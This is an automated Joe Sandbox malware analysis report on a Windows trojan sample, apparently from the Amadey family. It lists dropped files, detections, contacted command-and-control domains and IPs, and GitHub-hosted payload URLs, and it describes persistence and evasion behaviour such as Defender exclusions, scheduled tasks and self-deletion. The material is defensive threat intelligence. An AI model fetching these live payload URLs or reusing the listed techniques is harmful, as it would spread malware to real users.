    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572166 Sample: dYUteuvmHn.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 144 rootunvbot.com 2->144 146 raw.githubusercontent.com 2->146 148 2 other IPs or domains 2->148 166 Malicious sample detected (through community Yara rule) 2->166 168 Antivirus detection for URL or domain 2->168 170 Antivirus detection for dropped file 2->170 172 15 other signatures 2->172 12 curlapp64.exe 1 2->12         started        15 svchost.exe 2->15         started        19 dYUteuvmHn.exe 3 2->19         started        21 2 other processes 2->21 signatures3 process4 dnsIp5 136 C:\Windows \System32\printui.dll (copy), PE32+ 12->136 dropped 23 cmd.exe 2 12->23         started        38 3 other processes 12->38 156 rootunvbot.com 188.116.21.204 NEPHAX-ASPL Poland 15->156 158 ipinfo.io 34.117.59.81 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 15->158 160 Found API chain indicative of debugger detection 15->160 162 Adds a directory exclusion to Windows Defender 15->162 26 cmd.exe 15->26         started        28 cmd.exe 15->28         started        30 cmd.exe 15->30         started        32 cmd.exe 15->32         started        138 C:\Users\user\Desktop\zlib1.dll, PE32+ 19->138 dropped 140 C:\Users\user\Desktop\libcurl.dll, PE32+ 19->140 dropped 142 C:\Users\user\Desktop\curlapp64.exe, PE32+ 19->142 dropped 164 Self deletion via cmd or bat file 19->164 34 cmd.exe 1 19->34         started        36 cmd.exe 1 19->36         started        40 4 other processes 21->40 file6 signatures7 process8 signatures9 174 Drops executables to the windows directory (C:\Windows) and starts them 23->174 42 4 other processes 23->42 46 2 other processes 26->46 48 2 other processes 28->48 50 2 other processes 30->50 52 2 other processes 32->52 176 Suspicious powershell command line found 34->176 178 Uses schtasks.exe or at.exe to add and modify task schedules 34->178 180 Adds a directory exclusion to Windows Defender 34->180 54 2 other processes 34->54 57 2 other processes 36->57 59 4 other processes 38->59 61 6 other processes 40->61 process10 dnsIp11 124 C:\Windows\System32\zlib1.dll, PE32+ 42->124 dropped 126 C:\Windows\System32\x610437.dat, PE32+ 42->126 dropped 128 C:\Windows\System32\ucrtbased.dll, PE32+ 42->128 dropped 134 11 other files (9 malicious) 42->134 dropped 184 Adds a directory exclusion to Windows Defender 42->184 186 Suspicious command line found 42->186 63 cmd.exe 42->63         started        66 cmd.exe 1 42->66         started        68 cmd.exe 42->68         started        74 4 other processes 42->74 188 Loading BitLocker PowerShell Module 52->188 150 github.com 20.233.83.145, 443, 49706, 49712 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 54->150 152 raw.githubusercontent.com 185.199.109.133, 443, 49715, 49720 FASTLYUS Netherlands 54->152 154 127.0.0.1 unknown unknown 54->154 130 C:\Users\user\Desktop\prnttemp.dll, PE32+ 54->130 dropped 132 C:\Windows \System32\printui.exe, PE32+ 54->132 dropped 190 Multi AV Scanner detection for dropped file 54->190 192 Machine Learning detection for dropped file 54->192 70 cmd.exe 1 54->70         started        72 cmd.exe 4 54->72         started        file12 signatures13 process14 signatures15 204 Drops executables to the windows directory (C:\Windows) and starts them 63->204 76 bav64.exe 63->76         started        79 conhost.exe 63->79         started        206 Suspicious powershell command line found 66->206 81 powershell.exe 23 66->81         started        83 conhost.exe 66->83         started        85 console_zero.exe 68->85         started        87 conhost.exe 68->87         started        91 2 other processes 70->91 89 conhost.exe 72->89         started        208 Adds a directory exclusion to Windows Defender 74->208 93 10 other processes 74->93 process16 signatures17 194 Multi AV Scanner detection for dropped file 76->194 196 Machine Learning detection for dropped file 76->196 95 cmd.exe 76->95         started        97 cmd.exe 76->97         started        99 cmd.exe 76->99         started        103 6 other processes 76->103 198 Found suspicious powershell code related to unpacking or dynamic code loading 81->198 200 Loading BitLocker PowerShell Module 81->200 101 cmd.exe 85->101         started        202 Creates a Windows Service pointing to an executable in C:\Windows 93->202 process18 process19 105 powershell.exe 95->105         started        108 powershell.exe 97->108         started        110 powershell.exe 99->110         started        112 conhost.exe 101->112         started        114 schtasks.exe 101->114         started        116 powershell.exe 103->116         started        118 powershell.exe 103->118         started        120 powershell.exe 103->120         started        122 2 other processes 103->122 signatures20 182 Loading BitLocker PowerShell Module 105->182

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    dYUteuvmHn.exe66%ReversingLabsWin64.Trojan.Amadey
    dYUteuvmHn.exe100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\Desktop\prnttemp.dll100%AviraHEUR/AGEN.1300651
    C:\Users\user\Desktop\curlapp64.exe100%Joe Sandbox ML
    C:\Windows\System32\bav64.exe100%Joe Sandbox ML
    C:\Users\user\Desktop\curlapp64.exe45%ReversingLabsWin64.Trojan.Cerbu
    C:\Users\user\Desktop\libcurl.dll0%ReversingLabs
    C:\Users\user\Desktop\prnttemp.dll27%ReversingLabsWin64.Trojan.Giant
    C:\Users\user\Desktop\zlib1.dll0%ReversingLabs
    C:\Windows \System32\printui.dll (copy)27%ReversingLabsWin64.Trojan.Giant
    C:\Windows \System32\printui.exe0%ReversingLabs
    C:\Windows\System32\bav64.exe42%ReversingLabsWin64.Trojan.Generic
    C:\Windows\System32\console_zero.exe46%ReversingLabsWin64.Trojan.Generic
    C:\Windows\System32\libcrypto-3-x64.dll0%ReversingLabs
    C:\Windows\System32\libcurl.dll0%ReversingLabs
    C:\Windows\System32\libiconv-2.dll0%ReversingLabs
    C:\Windows\System32\libintl-9.dll0%ReversingLabs
    C:\Windows\System32\libpq.dll0%ReversingLabs
    C:\Windows\System32\libssl-3-x64.dll0%ReversingLabs
    C:\Windows\System32\libwinpthread-1.dll0%ReversingLabs
    C:\Windows\System32\svcldr64.dat39%ReversingLabsWin64.Trojan.Lazy
    C:\Windows\System32\ucrtbased.dll0%ReversingLabs
    C:\Windows\System32\vcruntime140d.dll0%ReversingLabs
    C:\Windows\System32\x610437.dat71%ReversingLabsWin64.Trojan.Cerbu
    C:\Windows\System32\zlib1.dll0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://raw.githubusercontent.c0%Avira URL Cloudsafe
    http://unvdwl.com/un2/botprnt.datsInfon100%Avira URL Cloudmalware
    http://unvdwl.com/un2/botprnt.datsInfo100%Avira URL Cloudmalware
    http://unvdwl.com/un2/botprnt.dat100%Avira URL Cloudmalware
    http://www.zlib.net/D0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    github.com
    		20.233.83.145
    		truefalse
      		high
      ipinfo.io
      		34.117.59.81
      		truefalse
        		high
        raw.githubusercontent.com
        		185.199.109.133
        		truefalse
          		high
          rootunvbot.com
          		188.116.21.204
          		truefalse
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprnt.datfalse
              		high
              https://github.com/botrunvd01/botdwl/raw/main/botprnt.datfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://contoso.com/Licensepowershell.exe, 0000002D.00000002.2938384773.0000021FD8097000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://raw.githubusercontent.ccurlapp64.exe, 00000005.00000003.2483165548.0000022DE26F2000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2494142253.0000022DE26F3000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000002.2494596778.0000022DE26F3000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2588031470.0000021656B68000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000002.2588286320.0000021656B68000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2581660737.0000021656B67000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://unvdwl.com/un2/botprnt.datsInfoncurlapp64.exe, 00000008.00000002.2588286320.0000021656B37000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/unv.datsvchost.exe, 00000037.00000002.3295722777.000001C2A44E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295341739.000001C2A4445000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295722777.000001C2A44EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295341739.000001C2A442B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295722777.000001C2A44EA000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://www.openssl.org/svchost.exefalse
                      		high
                      http://unvdwl.com/un2/botprnt.datsInfocurlapp64.exe, 0000000B.00000002.2670992217.000002552EEA8000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprnllcurlapp64.exe, 00000005.00000003.2483165548.0000022DE26F2000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2494142253.0000022DE26F3000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000002.2494596778.0000022DE26F3000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/botrunvd01/botdwl/raw/main/botprnt.date-Agecurlapp64.exe, 00000008.00000003.2588031470.0000021656B68000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000002.2588286320.0000021656B68000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2581660737.0000021656B67000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://curl.se/docs/hsts.htmldYUteuvmHn.exefalse
                            		high
                            https://curl.se/docs/alt-svc.html#curlapp64.exe, svchost.exefalse
                              		high
                              https://curl.se/curlapp64.exe, svchost.exefalse
                                		high
                                https://github.com/botrunvd01/botdwl/raw/main/botprnt.datQcurlapp64.exe, 0000000B.00000003.2664909778.000002552EEC0000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000002.2671597203.000002552EED2000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000003.2664931093.000002552EED1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://curl.se/docs/hsts.html#curlapp64.exefalse
                                    		high
                                    https://github.com/runvd01/dwl/raw/refs/heads/main/un2/uusb.dat9116689160438357301003900111svchost.exe, 00000037.00000002.3295722777.000001C2A44EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/powershell.exe, 0000002D.00000002.2938384773.0000021FD8097000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://nuget.org/nuget.exepowershell.exe, 0000002D.00000002.2938384773.0000021FD8097000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://ipinfo.io/jsonsvchost.exe, 00000037.00000002.3295722777.000001C2A4486000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpu.datsvchost.exe, 00000037.00000002.3295722777.000001C2A44E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295515594.000001C2A444B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295341739.000001C2A442B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295515594.000001C2A4460000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295722777.000001C2A44EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprnZcurlapp64.exe, 00000008.00000003.2588031470.0000021656B68000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000002.2588286320.0000021656B68000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2581660737.0000021656B67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000002D.00000002.2918363096.0000021FC8031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://github.com/runvd01/dwl/raw/refs/heads/main/un2/uusb.datsvchost.exe, 00000037.00000002.3295341739.000001C2A442B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295722777.000001C2A44EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295722777.000001C2A4486000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/botrunvd01/botdwl/raw/main/botprnt.datdll5curlapp64.exe, 00000005.00000002.2494596778.0000022DE26CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprnt.datLcurlapp64.exe, 00000008.00000003.2588031470.0000021656B4B000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000002.2588286320.0000021656B4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.gnu.org/licenses/svchost.exe, 00000037.00000002.3294476493.00000000682A4000.00000008.00000001.01000000.00000013.sdmpfalse
                                                          		high
                                                          http://nuget.org/NuGet.exepowershell.exe, 0000002D.00000002.2938384773.0000021FD8097000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprnt.dattprnt.datcurlapp64.exe, 00000005.00000002.2494596778.0000022DE26CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/botrunvd01/botdwl/raw/main/botprnt.datlcurlapp64.exe, 00000005.00000002.2494596778.0000022DE26CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000002D.00000002.2918363096.0000021FC8256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://curl.se/docs/http-cookies.htmldYUteuvmHn.exefalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000002D.00000002.2918363096.0000021FC8256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000002D.00000002.2918363096.0000021FC8256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ipinfo.io/json2H2svchost.exe, 00000037.00000002.3295722777.000001C2A4486000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://github.com/botrunvd01/botdwl/raw/main/botprnt.datdcurlapp64.exe, 0000000B.00000002.2670992217.000002552EEB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://contoso.com/Iconpowershell.exe, 0000002D.00000002.2938384773.0000021FD8097000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://dns.google/resolve?name=dYUteuvmHn.exefalse
                                                                                		high
                                                                                https://www.gnu.org/licenses/svchost.exe, 00000037.00000002.3293593062.00000000660F4000.00000008.00000001.01000000.00000016.sdmpfalse
                                                                                  		high
                                                                                  https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprnt.dat2curlapp64.exe, 00000008.00000003.2588031470.0000021656B4B000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000002.2588286320.0000021656B4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://github.com/botrunvd01/botdwl/raw/main/botprnt.datdllZcurlapp64.exe, 0000000B.00000002.2670992217.000002552EEB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://curl.se/docs/alt-svc.htmldYUteuvmHn.exefalse
                                                                                        		high
                                                                                        https://github.com/botrunvd01/botdwl/raw/main/botprnt.datXcurlapp64.exe, 00000005.00000002.2494596778.0000022DE26CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://github.com/Pester/Pesterpowershell.exe, 0000002D.00000002.2918363096.0000021FC8256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://curl.se/docs/copyright.htmlDdYUteuvmHn.exefalse
                                                                                              		high
                                                                                              https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpusys.datsvchost.exe, 00000037.00000002.3295722777.000001C2A44E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295515594.000001C2A444B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295341739.000001C2A442B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295515594.000001C2A4460000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295722777.000001C2A44EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.zlib.net/curlapp64.exe, svchost.exefalse
                                                                                                  		high
                                                                                                  http://unvdwl.com/un2/botprnt.datcurlapp64.exe, 00000005.00000002.2494596778.0000022DE26CC000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000002.2588286320.0000021656B37000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000002.2670992217.000002552EEA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  		unknown
                                                                                                  http://mingw-w64.sourceforge.net/Xsvchost.exe, 00000037.00000002.3292747855.0000000064953000.00000008.00000001.01000000.00000015.sdmpfalse
                                                                                                    		high
                                                                                                    https://curl.se/docs/copyright.htmlcurlapp64.exe, svchost.exefalse
                                                                                                      		high
                                                                                                      http://www.zlib.net/DdYUteuvmHn.exefalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000002D.00000002.2918363096.0000021FC8256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.openssl.org/Hsvchost.exe, 00000037.00000002.3297407684.00007FF8B83F1000.00000002.00000001.01000000.00000012.sdmp, svchost.exe, 00000037.00000002.3296835275.00007FF8A7C8E000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                                          		high
                                                                                                          https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprncurlapp64.exe, 00000005.00000003.2483165548.0000022DE26F2000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2494142253.0000022DE26F3000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000002.2494596778.0000022DE26F3000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2588031470.0000021656B68000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000002.2588286320.0000021656B68000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2581660737.0000021656B67000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000003.2664909778.000002552EEC0000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000002.2671597203.000002552EED2000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000003.2664931093.000002552EED1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://aka.ms/pscore68powershell.exe, 0000002D.00000002.2918363096.0000021FC8031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://curl.se/docs/http-cookies.html#curlapp64.exefalse
                                                                                                                		high
                                                                                                                https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/uamd.datsvchost.exe, 00000037.00000002.3295722777.000001C2A44E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295341739.000001C2A4445000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295341739.000001C2A442B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295515594.000001C2A4460000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295722777.000001C2A44EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://ipinfo.io/json6600svchost.exe, 00000037.00000002.3295722777.000001C2A4486000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://curl.se/VdYUteuvmHn.exefalse
                                                                                                                      		high

                                                                                                                      World Map of Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public IPs

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      185.199.109.133
                                                                                                                      		raw.githubusercontent.comNetherlands
                                                                                                                      		54113FASTLYUSfalse
                                                                                                                      34.117.59.81
                                                                                                                      		ipinfo.ioUnited States
                                                                                                                      		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                      20.233.83.145
                                                                                                                      		github.comUnited States
                                                                                                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                      188.116.21.204
                                                                                                                      		rootunvbot.comPoland
                                                                                                                      		43333NEPHAX-ASPLfalse

                                                                                                                      Private

                                                                                                                      IP
                                                                                                                      127.0.0.1

                                                                                                                      General Information

                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1572166
                                                                                                                      Start date and time:2024-12-10 07:34:04 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 11m 44s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:103
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:1
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:dYUteuvmHn.exe
                                                                                                                      renamed because original name is a hash value
                                                                                                                      Original Sample Name:f5bd4bbc494017262a22785e5b53f316.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.evad.winEXE@155/76@4/5
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 66.7%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 84%
                                                                                                                      • Number of executed functions: 113
                                                                                                                      • Number of non-executed functions: 200
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                      Warnings

                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7112 because it is empty
                                                                                                                      • Execution Graph export aborted for target printui.exe, PID 6308 because there are no executed function
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      • VT rate limit hit for: dYUteuvmHn.exe

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      01:36:17API Interceptor1x Sleep call for process: printui.exe modified
                                                                                                                      01:36:19API Interceptor231x Sleep call for process: powershell.exe modified
                                                                                                                      01:36:37API Interceptor1x Sleep call for process: svchost.exe modified
                                                                                                                      01:36:38API Interceptor2x Sleep call for process: console_zero.exe modified
                                                                                                                      07:34:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run curlapp64 C:\Users\user\Desktop\curlapp64.exe
                                                                                                                      07:35:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run curlapp64 C:\Users\user\Desktop\curlapp64.exe
                                                                                                                      07:36:40Task SchedulerRun new task: console_zero path: C:\Windows\System32\console_zero.exe

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      185.199.109.133cr_asm3.ps1Get hashmaliciousUnknownBrowse
                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                      gabe.ps1Get hashmaliciousUnknownBrowse
                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                      5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                      HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                      steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                      OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                      steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                      SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                                                      SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                                                      34.117.59.81Code%20Send%20meta%20Discord%20EXE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                      • ipinfo.io/json
                                                                                                                      idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                                                                      • ipinfo.io/json
                                                                                                                      idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                                                                      • ipinfo.io/json
                                                                                                                      FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmdGet hashmaliciousUnknownBrowse
                                                                                                                      • ipinfo.io/json
                                                                                                                      172.104.150.66.ps1Get hashmaliciousUnknownBrowse
                                                                                                                      • ipinfo.io/json
                                                                                                                      VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                                                                      • ipinfo.io/json
                                                                                                                      UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                                                                      • ipinfo.io/json
                                                                                                                      I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                                                                      • ipinfo.io/json
                                                                                                                      licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                                                                      • ipinfo.io/ip
                                                                                                                      build.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • ipinfo.io/ip

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      ipinfo.iohttps://drive.google.com/file/d/1yoYdaJg2olHzjqEKXjn6nnXKPPak7HoL/view?usp=sharing_eil&ts=675747b9Get hashmaliciousUnknownBrowse
                                                                                                                      • 34.117.59.81
                                                                                                                      zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                      • 34.117.59.81
                                                                                                                      https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 34.117.59.81
                                                                                                                      eEiHdLSfum.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 34.117.59.81
                                                                                                                      eEiHdLSfum.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 34.117.59.81
